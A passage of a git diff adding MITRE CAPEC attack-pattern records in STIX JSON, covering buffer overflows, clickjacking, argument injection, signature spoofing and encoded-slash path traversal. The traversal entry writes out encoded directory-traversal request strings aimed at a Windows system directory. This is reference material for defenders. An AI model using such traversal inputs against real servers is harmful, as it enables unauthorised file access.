{ + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_example_instances": [ + "During shipment the attacker is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the attacker to remotely communicate with the system and use it as a conduit for additional compromise within the victim's environment." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3a0eb592-a0cc-4084-87bb-044a61fef3ef.json b/capec/attack-pattern/attack-pattern--3a0eb592-a0cc-4084-87bb-044a61fef3ef.json new file mode 100644 index 0000000000..1249b7efd0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3a0eb592-a0cc-4084-87bb-044a61fef3ef.json @@ -0,0 +1,116 @@ +{ + "type": "bundle", + "id": "bundle--2893ded6-6242-421d-a37b-a841b357feb1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3a0eb592-a0cc-4084-87bb-044a61fef3ef", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Buffer Overflow via Parameter Expansion", + "description": "In this attack, the target software is given input that the attacker knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/47.html", + "external_id": "CAPEC-47" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html", + "external_id": "CWE-118" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/130.html", + "external_id": "CWE-130" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html", + "external_id": "CWE-131" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: FTP glob()\n The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().\n This buffer overflow occurs in memory that is dynamically allocated. It may be possible for attackers to exploit this vulnerability and execute arbitrary code on the affected host.\n To exploit this, the attacker must be able to create directories on the target host.\n The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote attacker can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the attacker must be able to create directories on the FTP server.\n [R.47.1][REF-2]See also: CVE-2001-0249", + "\n Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.\n The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer.See also: CVE-2006-6652" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.", + "The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is)." + ], + "x_capec_resources_required": [ + "Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful." + ], + "x_capec_skills_required": { + "High": "Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the attacker needs to write the shell code to accomplish his or her goals, but the attacker also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled attacker." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0.json b/capec/attack-pattern/attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0.json new file mode 100644 index 0000000000..08703af06c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0.json @@ -0,0 +1,144 @@ +{ + "type": "bundle", + "id": "bundle--3787704f-ba9d-4c13-a6ee-d08efbd14a46", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Using Slashes in Alternate Encoding", + "description": "This attack targets the encoding of the Slash characters. An attacker would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the attacker many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/79.html", + "external_id": "CAPEC-79" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html", + "external_id": "CWE-180" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html", + "external_id": "CWE-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html", + "external_id": "CWE-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/21.html", + "external_id": "CWE-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html", + "external_id": "CWE-22" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html", + "external_id": "CWE-185" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html", + "external_id": "REF-525" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html", + "external_id": "REF-495" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Slashes in Alternate Encodings\n The two following requests are equivalent on most Web servers:\n http://target server/some_directory\\..\\..\\..\\winnt\n is equivalent to\n http://target server/some_directory/../../../winnt\n Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. Consider the strings\n http://target server/some_directory\\..%5C..%5C..\\winnt\n where %5C is equivalent to the \\ character.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application server accepts paths to locate resources.", + "The application server does insufficient input data validation on the resource path requested by the user.", + "The access right to resources are not set properly." + ], + "x_capec_skills_required": { + "Low": "An attacker can try variation of the slashes characters.", + "Medium": "An attacker can use more sophisticated tool or script to scan a website and find a path filtering problem." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0.json b/capec/attack-pattern/attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0.json new file mode 100644 index 0000000000..6e6b67aaa5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--1ec18340-606d-4cbe-b2dd-246178ce48d3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Catching exception throw/signal from privileged block", + "description": "Attackers can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. Having done so, the Attacker may not only likely access functionality the system's designer didn't intend for them, but they may also go undetected or deny other users essential service in a catastrophic (or insidiously subtle) way.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/236.html", + "external_id": "CAPEC-236" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html", + "external_id": "CWE-270" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Attacker targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread. The Attacker could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users", + "In order to feasibly execute this class of attacks, the attacker must have the ability to hijack a privileged thread.", + "This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such.", + "This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute." + ], + "x_capec_resources_required": [ + "\n None: No specialized resources are required to execute this type of attack. The attacker needs to be able to latch onto a privileged thread.\n The Attacker does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the Attacker's malicious code. This is the case even if the attacker conducts the attack remotely.\n " + ], + "x_capec_skills_required": { + "High": "Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf.json b/capec/attack-pattern/attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf.json new file mode 100644 index 0000000000..b08874e875 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf.json @@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--896ba9c4-f23d-45e0-8999-593a42bcd484", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Client-side Injection-induced Buffer Overflow", + "description": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/14.html", + "external_id": "CAPEC-14" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html", + "external_id": "CWE-353" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html", + "external_id": "CWE-118" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Buffer Overflow in Internet Explorer 4.0 Via EMBED Tag\n Authors often use tags in HTML documents. For example\n \n If an attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted client software communicates with an external server.", + "The targeted client software has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.", + "Low": "To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e.json b/capec/attack-pattern/attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e.json new file mode 100644 index 0000000000..293dbe4cbc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--2ded4012-6dd5-4976-ac4a-af282edf636c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Clickjacking", + "description": "In a clickjacking attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different system. While being logged in to some target system, the victim visits the adversary's malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/103.html", + "external_id": "CAPEC-103" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html", + "external_id": "CWE-1021" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which he or she subscribes with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.\n In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an adversary's account. Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client", + "The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.", + "The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)", + "The victim has an active session with the target system.", + "The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site are not trivial tasks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8.json b/capec/attack-pattern/attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8.json new file mode 100644 index 0000000000..40256e79f0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8.json @@ -0,0 +1,105 @@ +{ + "type": "bundle", + "id": "bundle--e678f752-93cc-4d38-9fb8-97d93d30878c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Argument Injection", + "description": "An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/6.html", + "external_id": "CAPEC-6" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html", + "external_id": "CWE-146" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html", + "external_id": "CWE-78" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html", + "external_id": "CWE-185" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Jouko Pynnonen, Java Web Start argument injection vulnerability", + "url": "http://www.securityfocus.com/archive/1/393696", + "external_id": "REF-482" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [R.6.2]" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.", + "Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3c8e5662-f840-45b4-944a-d2498837df44.json b/capec/attack-pattern/attack-pattern--3c8e5662-f840-45b4-944a-d2498837df44.json new file mode 100644 index 0000000000..f7f92c6998 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3c8e5662-f840-45b4-944a-d2498837df44.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--26aeebec-118d-4c9a-9512-fec0be825283", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3c8e5662-f840-45b4-944a-d2498837df44", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Signature Spoofing by Key Recreation", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/485.html", + "external_id": "CAPEC-485" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html", + "external_id": "CWE-330" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/310.html", + "external_id": "CWE-310" + }, + { + "source_name": "reference_from_CAPEC", + "description": "P.J. Leadbitter, D. Page, N.P. Smart, Attacking DSA Under a Repeated Bits Assumption, 2004--07, http://www.iacr.org/archive/ches2004/31560428/31560428.pdf", + "external_id": "REF-419" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Debian Security, DSA-1571-1 openssl -- predictable random number generator, 2008--05---13, http://www.debian.org/security/2008/dsa-1571", + "external_id": "REF-420" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.", + "An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer." + ], + "x_capec_skills_required": { + "High": "Ability to create malformed data blobs and know how to present them directly or indirectly to a victim." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3d3dc1b3-7927-4b9f-b518-e854ee12ce34.json b/capec/attack-pattern/attack-pattern--3d3dc1b3-7927-4b9f-b518-e854ee12ce34.json new file mode 100644 index 0000000000..970f1cceff --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3d3dc1b3-7927-4b9f-b518-e854ee12ce34.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--c1aaaacb-2583-444e-8187-da8bd3e9d1cc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3d3dc1b3-7927-4b9f-b518-e854ee12ce34", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoof", + "description": "An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/473.html", + "external_id": "CAPEC-473" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html", + "external_id": "CWE-327" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.", + "An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor." + ], + "x_capec_prerequisites": [ + "The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.", + "The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature." + ], + "x_capec_skills_required": { + "High": "Technical understanding of how signature verification algorithms work with data and applications" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e.json 